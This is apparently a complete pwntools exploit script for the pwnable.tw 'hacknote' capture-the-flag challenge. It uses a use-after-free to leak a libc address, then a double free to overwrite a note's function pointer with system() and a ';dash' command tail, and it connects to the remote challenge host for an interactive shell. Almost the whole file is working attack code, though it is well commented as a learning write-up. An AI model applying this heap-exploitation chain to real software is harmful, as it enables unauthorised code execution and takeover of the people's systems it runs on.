#!/usr/bin/env python
# pwnable.tw hacknote
from pwn import *
debug = 0  # 1: run ./hacknote locally and pause for a debugger; 0: attack chall.pwnable.tw:10102 (see __main__)
def menu(choice):
    """Pick menu option *choice* after the program prints its ``choice :`` prompt.

    The option number is sent as text with no trailing newline (``send``,
    not ``sendline``), exactly as the rest of the script talks to the target.
    """
    s.sendafter('choice :', str(choice))
def add(size, content):
    """Menu option 1: create a note of *size* bytes holding *content*.

    *size* is an int and *content* a str; both are written without a trailing
    newline.  exploit() tracks the resulting note indices itself (0, 1, 2, ...
    in creation order), nothing is read back here.
    """
    menu(1)
    for prompt, answer in (('Note size :', str(size)), ('Content :', content)):
        s.recvuntil(prompt)
        s.send(answer)
    if debug:
        print('add finished')
def delete(index):
    """Menu option 2: free note *index*.

    exploit() relies on the target not invalidating the slot afterwards: a
    freed index is printed again (use-after-free) and freed a second time
    (double free).
    """
    menu(2)
    s.sendafter('Index :', str(index))
    if debug:
        print('delete finished')
def printNote(index):
    """Menu option 3: ask the target to print note *index*.

    exploit() uses this twice: on a freed note to read a leaked pointer back,
    and on a note whose header has been overwritten to fire the final payload.
    Any output is left in the tube for the caller to consume.
    """
    menu(3)
    s.sendafter('Index :', str(index))
    if debug:
        print('printNote finished')
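def exploit(arena_off=0x1b07b0, system_off=0x3a940):
    """Run the two-stage heap attack over the global tube ``s``.

    Stage 1, libc leak: note 0 is freed and then printed again, so the target
    keeps a stale pointer to the freed note (use-after-free).  Note 2 is
    created with the same size and is expected to be placed in note 0's old
    memory; printing note 0 then yields note 2's marker followed by whatever
    the allocator left in the freed chunk -- presumably an arena pointer,
    since subtracting ``arena_off`` from it is treated as the libc base.

    Stage 2, double free: note 1 is freed twice so later allocations hand out
    the same chunk more than once.  The sizes are chosen so that note 4's
    9-byte content lands where note 3's header lives, replacing the handler
    pointer with ``system`` and leaving ``;dash`` right behind it.  Printing
    note 3 then calls system() on that header; the shell treats the leading
    pointer bytes as a failed command and runs ``dash``.  The exact chunk
    layout is inferred from the sizes, not visible in this script.

    Args:
        arena_off: distance from the leaked pointer to the libc base.  The
            default is for the remote challenge libc; pass the value for the
            local libc when running with ``debug`` set.
        system_off: offset of ``system`` in that same libc.

    Raises:
        PwnlibException (via ``log.error``) when the leak does not produce a
        page-aligned libc base, i.e. the offsets do not match the target.
    """
    # --- stage 1: leak a libc pointer through the stale note-0 pointer ---
    add(0x60, 'A')          # note 0
    add(0x08, 'b')          # note 1
    delete(0)               # note 0 freed, yet still printable below
    add(0x60, 'z' * 4)      # note 2: same size, expected to reuse note 0's chunk
    printNote(0)
    s.recvuntil('z' * 4)
    leak = u32(s.recv(4))   # the 4 bytes following our marker in the freed chunk
    libc_base = leak - arena_off
    # A genuine libc base is page-aligned; anything else means the offsets
    # belong to a different libc and the final call would jump into garbage.
    if libc_base & 0xfff:
        log.error('leak 0x%x gives unaligned libc base 0x%x; check arena_off'
                  % (leak, libc_base))
    if debug:
        log.info('libc_base : ' + hex(libc_base))
    system = libc_base + system_off

    # --- stage 2: double free so a note header and a note body overlap ---
    delete(1)
    delete(1)               # second free of the same index: double free
    add(0x40, 'x')          # note 3: its header takes one copy of the freed chunk
    # Note 4's content goes into the other copy, i.e. over note 3's header:
    # handler pointer := system, then ';dash' as the command tail.
    # b'' keeps the literal the same type as p32() under both Python 2 and 3
    # (the original str literal raises TypeError on Python 3).
    add(9, p32(system) + b';dash')  # note 4
    printNote(3)            # -> system(note 3 header) -> "<ptr bytes>;dash"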
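if __name__ == '__main__':
    # debug=1: spawn the binary locally and pause so a debugger can attach
    # before any input is sent; debug=0: connect to the live challenge.
    if debug:
        s = process('./hacknote')
        pause()
    else:
        s = remote('chall.pwnable.tw', 10102)
    try:
        exploit()
        s.interactive()
    finally:
        # Always tear the tube down (and the local child with it), even when
        # the exploit chain aborts part-way, e.g. on a bad libc leak.
        s.close()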